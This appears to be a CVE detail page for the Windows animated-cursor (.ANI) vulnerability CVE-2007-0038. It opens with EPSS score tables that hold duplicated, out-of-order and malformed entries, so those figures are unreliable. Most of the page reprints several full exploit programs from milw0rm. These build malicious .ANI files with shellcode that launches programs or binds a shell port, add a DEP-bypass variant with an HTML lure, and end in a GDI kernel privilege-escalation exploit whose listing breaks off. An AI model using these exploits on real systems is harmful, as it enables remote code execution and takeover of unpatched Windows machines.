CVE-2007-0038 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	75.58%	–	–
2023-03-12	–	–	–	13.91%	–
2023-09-03	–	–	–	13.69%	–
2023-10-15	–	–	–	14.95%	–
2023-12-31	–	–	–	17.14%	–
2024-02-04	–	–	–	20.47%	–
2024-02-11	–	–	–	31.43%	–
2024-06-02	–	–	–	34.34%	–
2024-12-08	–	–	–	37.14%	–
2024-12-22	–	–	–	4%	–
2025-02-23	–	–	–	46.82%	–
2025-01-19	–	–	–	4%	–
2025-02-23	–	–	–	46.82%	–
2025-03-18	–	–	–	–	89.99%
2025-03-30	–	–	–	–	90.08%
2025-03-30	–	–	–	–	90.08,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	95%
2023-09-03	95%
2023-10-15	95%
2023-12-31	96%
2024-02-04	96%
2024-02-11	97%
2024-06-02	97%
2024-12-08	97%
2024-12-22	97%
2025-02-23	98%
2025-01-19	97%
2025-02-23	98%
2025-03-18	1%
2025-03-30	1%
2025-03-30	1%

/**************************************************************************** * MS Windows Explorer Unspecified .ANI File DoS * * * * * * Another .Ani bug that freezes Explorer if you open a folder that contains * * a crafted file. * * * * Tested against Win XP SP2 FR. * * Have Fun! * * * * Coded by Marsu <Marsupilamipowa@hotmail.fr> * ****************************************************************************/ #include "stdio.h" #include "stdlib.h" unsigned char Ani_headers[] = "\x52\x49\x46\x46\x08\x4d\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00" "\x0a\x00\x00\x00\x01\x00\x00\x00\x72\x61\x74\x65\x18\x00\x00\x00" "\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00" "\x03\x00\x00\x00\x03\x00\x00\x00\x4c\x49\x53\x54\xa8\x4c\x00\x00" "\x66\x72\x61\x6d\x69\x63\x6f\x6e\xbe\x0c\x00\x00\x00\x00\x02\x00" "\x01\x00\x20\x20\x00\x57\x57\x57\x57\x00\xa8\x0c\x00\x00\x16\x00" "\x00\x00\x03" //Change this last char to avoid crash ; int main(int argc, char* argv[]) { FILE* anifile; char evilbuff[4000]; printf("[+] MS Windows Explorer Unspecified .ANI File DoS\n"); printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>\n"); if (argc!=2) { printf("[+] Usage: %s <file.ani>\n",argv[0]); return 0; } memset(evilbuff,'A',4000); memcpy(evilbuff,Ani_headers,sizeof(Ani_headers)-1); if ((anifile=fopen(argv[1],"wb"))==0) { printf("[-] Unable to access file.\n"); return 0; } fwrite( evilbuff, 1, 4000, anifile ); fclose(anifile); printf("[+] Done. Have fun!\n"); return 0; } // milw0rm.com [2007-04-08]

/*************************************************************************** * MS Windows .ANI File Local Buffer Overflow * * * * * * Credits go to Trirat Puttaraksa cause his PoC inspired this source. * * devcode's exploit didnt work for me, so I made my own. * * This exploit launches calc.exe on a lot of app (Word, Winamp, etc...). * * * Turn off DEP to get it work on Explorer. * * * * Tested against Win XP SP2 FR. * * Have Fun! * * * * Coded by Marsu <Marsupilamipowa@hotmail.fr> * ***************************************************************************/ #include "stdio.h" #include "stdlib.h" /* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char CalcShellcode[] = "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26" "\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6" "\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa" "\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee" "\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85" "\xad\x49\x79\x68\x79\x59\x33\x08\xad\x59\xb9\xe2\xcd\xcc\x6e\xc7" "\x22\x86\x03\x23\x42\xce\x72\xd3\xa3\x85\x4a\xef\xad\x05\x3e\x68" "\x56\x59\x9f\x68\x4e\x4d\xd9\xea\xad\xc5\x82\xe3\x26\x45\xb9\x8b" "\x1a\x1a\x03\x15\x46\x13\xbb\x1b\xa5\x85\x49\xb3\x4e\x3b\xea\x01" "\x55\x2d\xaa\x1d\xac\x4b\x65\x1c\xc1\x26\x53\x8f\x45\x6b\x57\x9b" "\x43\x45\x32\xe3"; unsigned char Ani_headers[] = "\x52\x49\x46\x46\x13\x03\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xff\xff\x00\x00\x09\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x04\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4c\x03\x00\x00\x00" "\x00\x00\x00\x00\x54\x53\x49\x4c\x04\x00\x00\x00\x02\x02\x02\x02" "\x61\x6e\x69\x68\xff\xff\x00\x00"; int main(int argc, char* argv[]) { FILE* anifile; char evilbuff[66000]; printf("[+] MS Windows .ANI File Buffer Overflow \n"); printf("[+] Greetz to Trirat Puttaraksa\n"); printf("[+] Coded by Marsu <Marsupilamipowa@hotmail.fr>\n"); if (argc!=2) { printf("[+] Usage: %s <file.ani>\n",argv[0]); return 0; } memset(evilbuff,'C',66000); memcpy(evilbuff,Ani_headers,sizeof(Ani_headers)-1); memcpy(evilbuff+168,"\x7b\x1a\x80\x7c",4); /* CALL ESI in Kernel32.dll */ memcpy(evilbuff+245,CalcShellcode,strlen(CalcShellcode)); memset(evilbuff+65623,0,1); if ((anifile=fopen(argv[1],"wb"))==0) { printf("[-] Unable to access file.\n"); return 0; } fwrite( evilbuff, 1, 65623, anifile ); fclose(anifile); printf("[+] Done. Have fun!\n"); return 0; } // milw0rm.com [2007-04-02]

/* .ANI exploit tested on Windows XP SP2 - Portuguese Shellcode port bind 13579 JMP ESP Addr - ntdll.dll Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna. Exploit coded listen sauna hits Featuring Luiz Zanardo's gigs "Minoide - \x52\x49\x46\x46\x00\x04\x00\x41" @ www.myspace.com/fuzzyproject Breno Silva Pinto bsilva[at]Sekure.org */ #include <stdio.h> #include <stdlib.h> #include <windows.h> unsigned char aniheader[] = "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" "\x61\x6E\x69\x68\xA8\x03\x00\x00"; unsigned char Shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8f" "\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\x67\xcc\xc8\x7a" "\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\xf7\x34\xd8\x0e" "\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\x04\x34\xd9\xb4" "\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\x64\xc1\x0c\xd1" "\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\xc4\xbe\x68\x99" "\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\x4f\x51\xbc\xc5" "\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\xe7\xbb\x79\x8b" "\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\xe7\x42\x44\xb7" "\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\xd0\xbc\xd2\xe3" "\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\x7a\x98\x60\x7a" "\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\xe9\x5d\x02\x8e" "\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\x59\x5f\x27\xd4" "\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\xda\xca\xe7\xed" "\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\x5f\xa6\x5f\x62" "\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\xe9\x5d\x54\xe8" "\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\x6d\x04\xf7\x76" "\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\x24\x9e\x5f\xf7" "\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\xde\x64\x5d\x84" "\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\x70\xe3\x5d\x7a" "\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\xdd\xca\xe7\xed" "\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85"; int main( int argc, char **argv ) { char Buffer[1024]; FILE *f; if ( argc < 2 ) { printf("usage %s <file.ani>\n",argv[0]); return 0; } memset( Buffer, 0x90, sizeof( Buffer ) ); memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 ); memcpy( Buffer + 168, "\xed\x1e\x94\x7c", 4 ); // JMP ESP - NTDLL. Hey Dave ... this is for you brotha! memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 ); f = fopen( argv[1], "wb" ); if ( f == NULL ) { printf("Cannot create file\n"); return 0; } fwrite(Buffer, 1, 1024, f); fclose(f); printf(".ANI file created!\n"); return 0; } // milw0rm.com [2007-04-09]

/* * version 0.5 * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2 * [CVE-2007-1765] * * * Description: * A vulnerability has been identified in Microsoft Windows, * which could be exploited by remote attackers to take complete * control of an affected system. This issue is due to a stack overflow * error within the "LoadAniIcon()" [user32.dll] function when rendering * cursors, animated cursors or icons with a malformed header, which could * be exploited by remote attackers to execute arbitrary commands by * tricking a user into visiting a malicious web page or viewing an email * message containing a specially crafted ANI file. * * Hotfix/Patch: * None as of this time. * * Vulnerable systems: * Microsoft Windows 2000 Service Pack 4 * Microsoft Windows XP Service Pack 2 * Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) * Microsoft Windows XP Professional x64 Edition * Microsoft Windows Server 2003 * Microsoft Windows Server 2003 (Itanium) * Microsoft Windows Server 2003 Service Pack 1 * Microsoft Windows Server 2003 Service Pack 1 (Itanium) * Microsoft Windows Server 2003 x64 Edition * Microsoft Windows Vista * * Microsoft Internet Explorer 6 * Microsoft Internet Explorer 7 * * Tested on: * Microsoft XP SP2 + DEP + Internet Explorer 6 * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Credit goes to HOD (if he/they exist :P) for the html. Works on * XP SP2 with Hardware DEP enabled, go figure. * * ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :) * * */ #include <iostream> #include <windows.h> /* ANI Header */ unsigned char uszAniHeader[] = "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" "\x61\x6E\x69\x68\xA8\x03\x00\x00"; /* system("calc.exe"); */ char szExecute[] = "logoff.exe\x00"; unsigned char uszHtml[] = "<html>" "Microsoft Windows .ANI LoadAniIcon Exploit" "<br>Copyright (c) 2007 devcode<br>" "<style>" \ "* {CURSOR: url(\"poc.ani\")}</style></head>" "</html>"; /* Usage: ani.exe 1*/ char szIntro[] = "\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n" "\t\t\tdevcode (c) 2007\n" "[+] Targets:\n" "\t(0) Kernel32.dll (ExitProcess)\n" "\t(1) Windows XP SP2 + DEP\n" "\t(2) Windows 2003 Server\n" "Usage: ani.exe <target>"; /* RET2LIBC attack */ typedef struct { const char *szTarget; /* kernel32.dll - set the proper stack frame LEA EBP, DWORD PTR SS:[ESP+10] SUB ESP, EAX PUSH EBX PUSH ESI PUSH EDI .... .... RETN */ unsigned char uszRet[5]; /* msvcrt.dll - system() */ unsigned char uszMsvcrtCall[5]; } TARGET; TARGET targets[] = { { "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90", "\x90\x90\x90\x90" }, { "Windows XP SP2", "\xD6\x24\x80\x7C", "\xC7\x93\xC2\x77" }, { "Windows 2003 Server", "\x0A\x17\xE4\x77", "\x10\x8C\xBB\x77" } }; int main( int argc, char **argv ) { char szBuffer[1024]; FILE *f; void *pExitProcess[4]; if ( argc < 2 ) { printf("%s\n", szIntro ); return 0; } if ( atoi( argv[1] ) == 0 ) { printf("[+] Getting ExitProcess address...\n"); *pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), "ExitProcess" ); if ( pExitProcess == NULL ) { printf("[-] Cannot get ExitProcess address\n"); return 0; } memcpy( targets[1].uszRet, pExitProcess, 4 ); } printf("[+] Creating ANI header...\n"); memset( szBuffer, 0x90, sizeof( szBuffer ) ); memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); printf("[+] Copying execution code...\n"); memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); memset( szBuffer + 136, 0, 4 ); memset( szBuffer + 204, 0, 4 ); szBuffer[136] = 0x6C; szBuffer[204] = 0x6C; memcpy( szBuffer + 196, targets[atoi(argv[1])].uszMsvcrtCall, 4 ); memcpy( szBuffer + 200, targets[atoi(argv[1])].uszMsvcrtCall, 4 ); memcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 ); f = fopen( "poc.ani", "wb" ); if ( f == NULL ) { printf("[-] Cannot create ani file\n"); return 0; } fwrite( szBuffer, 1, 1024, f ); fclose( f ); printf("[+] .ANI file succesfully created!\n"); f = fopen( "poc.html", "wb" ); if ( f == NULL ) { printf("[-] Cannot create html file\n"); return 0; } fwrite( uszHtml, 1, sizeof( uszHtml ), f ); fclose( f ); printf("[+] HTML file succesfully created!\n"); return 0; } // milw0rm.com [2007-04-03]

/* * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Windows .ANI LoadAniIcon Stack Overflow * [CVE-2007-1765] * * * Description: * A vulnerability has been identified in Microsoft Windows, * which could be exploited by remote attackers to take complete * control of an affected system. This issue is due to a stack overflow * error within the "LoadAniIcon()" [user32.dll] function when rendering * cursors, animated cursors or icons with a malformed header, which could * be exploited by remote attackers to execute arbitrary commands by * tricking a user into visiting a malicious web page or viewing an email * message containing a specially crafted ANI file. * * Hotfix/Patch: * None as of this time. * * Vulnerable systems: * Microsoft Windows 2000 Service Pack 4 * Microsoft Windows XP Service Pack 2 * Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) * Microsoft Windows XP Professional x64 Edition * Microsoft Windows Server 2003 * Microsoft Windows Server 2003 (Itanium) * Microsoft Windows Server 2003 Service Pack 1 * Microsoft Windows Server 2003 Service Pack 1 (Itanium) * Microsoft Windows Server 2003 x64 Edition * Microsoft Windows Vista * * Microsoft Internet Explorer 6 * Microsoft Internet Explorer 7 * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Notes: * For this to work on XP SP2 on explorer.exe, DEP has to be turned * off. * */ #include <iostream> #include <windows.h> /* ANI Header */ unsigned char uszAniHeader[] = "\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68" "\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00" "\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02" "\x61\x6E\x69\x68\xA8\x03\x00\x00"; /* Shellcode - metasploit exec calc.exe ^^ */ unsigned char uszShellcode[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42" "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32" "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a" "\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c" "\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57" "\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50" "\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d" "\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f" "\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a" "\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76" "\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65" "\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78" "\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f" "\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65" "\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d" "\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31" "\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69" "\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61" "\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70" "\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42"; char szIntro[] = "\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n" "\t\t\tdevcode (c) 2007\n" "[+] Targets:\n" "\t(1) Windows XP SP2\n" "\t(2) Kernel32.dll (ExitProcess)\n" "\t(3) Windows 2K SP4\n\n" "Usage: ani.exe <target> <file>"; typedef struct { const char *szTarget; unsigned char uszRet[5]; } TARGET; TARGET targets[] = { { "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */ { "Kernel32.dll (ExitProcess)", "\x90\x90\x90\x90" }, /* ExitProcess */ { "Windows 2K SP4", "\x29\x4C\xE1\x77" } }; int main( int argc, char **argv ) { char szBuffer[1024]; FILE *f; void *pExitProcess[4]; if ( argc < 3 ) { printf("%s\n", szIntro ); return 0; } if ( atoi( argv[1] ) == 1 ) { printf("[+] Getting ExitProcess address...\n"); *pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), "ExitProcess" ); if ( pExitProcess == NULL ) { printf("[-] Cannot get ExitProcess address\n"); return 0; } memcpy( targets[1].uszRet, pExitProcess, 4 ); } printf("[+] Creating ANI header...\n"); memset( szBuffer, 0x90, sizeof( szBuffer ) ); memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); printf("[+] Copying shellcode...\n"); memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 ); f = fopen( argv[2], "wb" ); if ( f == NULL ) { printf("[-] Cannot create file\n"); return 0; } fwrite( szBuffer, 1, 1024, f ); fclose( f ); printf("[+] .ANI file succesfully created!\n"); return 0; } // milw0rm.com [2007-03-31]

#define _WIN32_WINNT 0x0500 #include <windows.h> #include <shlwapi.h> #include <stdio.h> #pragma comment (lib, "user32.lib") #pragma comment (lib, "gdi32.lib") #pragma comment (lib, "shlwapi.lib") #pragma comment (lib, "ntdll.lib") /* Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the win32k's SSDT by 0x2. before : lkd> dps bf998300 L 2 bf998300 bf934921 win32k!NtGdiAbortDoc bf998304 bf94648d win32k!NtGdiAbortPath after : lkd> dps bf998300 L 2 bf998300 00000002 bf998304 bf94648d win32k!NtGdiAbortPath win32k.sys bDeleteBrush (called by DeleteObject) mov esi, [edx] ;esi=pKernelInfo cmp [esi+4], ebx ; ebx=0, we need [esi+4]>0 mov eax, [edx+0Ch] mov [ebp+var_8], eax ja short loc_BF80C1E7 ;jump if [esi+4] > 0 loc_BF80C1E7: mov eax, [esi+24h] ; [esi+24] = addr to hijack (here win32k SSDT) mov dword ptr [eax], 2 ; !!!!! At 0x2 we allocate memory with NtAllocateVirtualMemory and we copy our payload. Tested on windows xp sp2 french last updates (before MS07-017) Coded by Ivanlef0u. http://ivanlef0u.free.fr ref: http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx http://research.eeye.com/html/alerts/zeroday/20061106.html http://projects.info-pull.com/mokb/MOKB-06-11-2006.html https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf https://www.securityfocus.com/bid/20940/info */ typedef struct { DWORD pKernelInfo; WORD ProcessID; WORD _nCount; WORD nUpper; WORD nType; DWORD pUserInfo; } GDITableEntry; typedef enum _SECTION_INFORMATION_CLASS { SectionBasicInformation, SectionImageInformation }SECTION_INFORMATION_CLASS; typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0 PVOID BaseAddress; ULONG Attributes; LARGE_INTEGER Size; }SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION; extern "C" ULONG __stdcall NtQuerySection( IN HANDLE SectionHandle, IN SECTION_INFORMATION_CLASS SectionInformationClass, OUT PVOID SectionInformation, IN ULONG SectionInformationLength, OUT PULONG ResultLength OPTIONAL ); extern "C" ULONG __stdcall NtAllocateVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG AllocationSize, IN ULONG AllocationType, IN ULONG Protect ); typedef LONG NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation=11, } SYSTEM_INFORMATION_CLASS; typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11 ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; extern "C" NTSTATUS __stdcall NtQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL ); extern "C" ULONG __stdcall RtlNtStatusToDosError( NTSTATUS Status ); // generic kernel payload, reboot the b0x unsigned char Shellcode[]={ 0x60, //PUSHAD 0x55, //PUSH EBP 0x6A, 0x34, 0x5B, 0x64, 0x8B, 0x1B, 0x8B, 0x6B, 0x10, 0x8B, 0x45, 0x3C, 0x8B, 0x54, 0x05, 0x78, 0x03, 0xD5, 0x8B, 0x5A, 0x20, 0x03, 0xDD, 0x8B, 0x4A, 0x18, 0x49, 0x8B, 0x34, 0x8B, 0x03, 0xF5, 0x33, 0xFF, 0x33, 0xC0, 0xFC, 0xAC, 0x84, 0xC0, 0x74, 0x07, 0xC1, 0xCF, 0x0D, 0x03, 0xF8, 0xEB, 0xF4, 0x81, 0xFF, 0x1f, 0xaa ,0xf2 ,0xb9, //0xb9f2aa1f, KEBugCheck 0x75, 0xE1, 0x8B, 0x42, 0x24, 0x03, 0xC5, 0x66, 0x8B, 0x0C, 0x48, 0x8B, 0x42, 0x1C, 0x03, 0xC5, 0x8B, 0x04 ,0x88, 0x03, 0xC5, 0x33, 0xDB, 0xB3, 0xE5, 0x53, 0xFF, 0xD0, 0x5D, //POP EBP 0x61, //POPAD 0xC3 //RET }; ULONG GetWin32kBase() { ULONG i, Count, Status, BytesRet; PSYSTEM_MODULE_INFORMATION pSMI; Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, 0, &BytesRet); //allocation length if(Status!=STATUS_INFO_LENGTH_MISMATCH) printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status)); pSMI=(PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BytesRet); Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, BytesRet, &BytesRet); if(Status!=STATUS_SUCCESS) printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status)); /* The data returned to the SystemInformation buffer is a ULONG count of the number of handles followed immediately by an array of SYSTEM_MODULE_INFORMATION. */ Count=*(PULONG)pSMI; pSMI=(PSYSTEM_MODULE_INFORMATION)((PUCHAR)pSMI+4); for(i=0; i<Count; i++) { if(StrStr((pSMI+i)->ImageName, "win32k.sys")) return (ULONG)(pSMI+i)->Base; } HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, pSMI); return 0; } ULONG buff[500]={0}; int main(int argc, char* argv[]) { ULONG i, PID, Status, Old; LPVOID lpMapAddress=NULL; HANDLE hMapFile=(HANDLE)0x10; GDITableEntry *gdiTable; SECTION_BASIC_INFORMATION SBI; WORD Upr; ULONG Size=0x1000; PVOID Addr=(PVOID)0x2; printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n" "http://ivanlef0u.free.fr\n" "Be MAD!\n"); //allocate memory at addresse 0x2 Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); if(Status) printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status); else printf("Addr : 0x%x OKAY\n", Addr); memcpy(Addr, Shellcode, sizeof(Shellcode)); printf("win32.sys base : 0x%x\n", GetWin32kBase()); ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc HBRUSH hBr; hBr=CreateSolidBrush(0); Upr=(WORD)((DWORD)hBr>>16); printf("0x%x\n", Upr); while(!lpMapAddress) { hMapFile=(HANDLE)((ULONG)hMapFile+1); lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0); } if(lpMapAddress==NULL) { printf("Error with MapViewOfFile : %d\n", GetLastError()); return 0; } Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0); if (Status) //!=STATUS_SUCCESS (0) { printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status); return 0; } printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart); gdiTable=(GDITableEntry *)lpMapAddress; PID=GetCurrentProcessId(); for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry)) { if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush { printf("gdiTable : 0x%x\n", gdiTable); printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo); printf("ProcessID : %d\n", gdiTable->ProcessID); printf("_nCount : %d\n", gdiTable->_nCount); printf("nUpper : 0x%x\n", gdiTable->nUpper); printf("nType : 0x%x\n", gdiTable->nType ); printf("pUserInfo : 0x%x\n\n", 